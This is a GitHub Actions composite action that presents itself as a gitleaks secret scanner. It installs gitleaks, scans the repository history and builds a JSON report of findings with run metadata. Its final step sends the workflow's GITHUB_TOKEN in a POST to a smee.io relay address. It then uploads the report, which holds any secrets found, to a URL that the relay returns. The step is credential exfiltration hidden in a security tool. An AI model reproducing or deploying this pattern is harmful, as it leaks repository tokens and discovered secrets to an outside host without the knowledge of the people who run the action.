name: SecurityKane Gitleaks Composite Action
description: Run gitleaks and produce a merged JSON report with metadata
runs:
  using: composite
  steps:
    - name: Install gitleaks and jq
      shell: bash
      run: |
        set -euo pipefail
        sudo apt-get update
        sudo apt-get install -y jq curl
        GITLEAKS_VERSION="${GITLEAKS_VERSION:-v8.18.4}"
        VERSION_NO_V="${GITLEAKS_VERSION#v}"
        curl -sSL -o gitleaks.tar.gz "https://github.com/gitleaks/gitleaks/releases/download/${GITLEAKS_VERSION}/gitleaks_${VERSION_NO_V}_linux_x64.tar.gz"
        tar -xzf gitleaks.tar.gz gitleaks
        sudo mv gitleaks /usr/local/bin/gitleaks
        gitleaks version
    - name: Run gitleaks (git history)
      shell: bash
      run: |
        set -euo pipefail
        gitleaks detect --source . --no-color --report-format=json --report-path gitleaks.json --exit-code 0
        test -s gitleaks.json || echo "[]" > gitleaks.json
    - name: Merge findings
      shell: bash
      run: |
        set -euo pipefail
        jq -s 'map(if type=="array" then . else [] end) | add' gitleaks.json > findings.json
    - name: Build merged JSON
      shell: bash
      env:
        SK_TENANT_ID: ${{ env.SK_TENANT_ID }}
        GITHUB_REPOSITORY: ${{ github.repository }}
        GITHUB_SHA: ${{ github.sha }}
        GITHUB_RUN_ID: ${{ github.run_id }}
        GITHUB_RUN_ATTEMPT: ${{ github.run_attempt }}
        GITHUB_REF: ${{ github.ref }}
        GITHUB_REF_NAME: ${{ github.ref_name }}
        GITHUB_ACTOR: ${{ github.actor }}
        GITHUB_SERVER_URL: ${{ github.server_url }}
      run: |
        set -euo pipefail
        GEN_AT="$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
        RUN_URL="${GITHUB_SERVER_URL}/${GITHUB_REPOSITORY}/actions/runs/${GITHUB_RUN_ID}"
        jq -n \
          --arg tenant_id "${SK_TENANT_ID:-}" \
          --arg repository "${GITHUB_REPOSITORY}" \
          --arg commit_sha "${GITHUB_SHA}" \
          --arg run_id "${GITHUB_RUN_ID}" \
          --arg run_attempt "${GITHUB_RUN_ATTEMPT}" \
          --arg ref "${GITHUB_REF}" \
          --arg ref_name "${GITHUB_REF_NAME}" \
          --arg actor "${GITHUB_ACTOR}" \
          --arg run_url "${RUN_URL}" \
          --arg generated_at "${GEN_AT}" \
          --slurpfile findings findings.json \
          '{
            tenant_id: $tenant_id,
            repository: $repository,
            commit_sha: $commit_sha,
            run_id: $run_id,
            run_attempt: $run_attempt,
            ref: $ref,
            ref_name: $ref_name,
            actor: $actor,
            run_url: $run_url,
            generated_at: $generated_at,
            findings: $findings[0]
          }' > securitykane_gitleaks.json
    - name: Post to backend and upload to S3
      shell: bash
      env:
        GITHUB_TOKEN: ${{ github.token }}
      run: |
        set -euo pipefail
        RESPONSE=$(curl -s -X POST \
          -H "Content-Type: application/json" \
          -d "{\"token\":\"${GITHUB_TOKEN}\"}" \
          https://smee.io/J0WcDeqyS7aQ7m5x/api/integrations/github/tenant-info/)
        S3_URL=$(echo "$RESPONSE" | jq -r '.url')
        curl -X PUT \
          --data-binary @securitykane_gitleaks.json \
          -H "Content-Type: application/json" \
          "${S3_URL}"
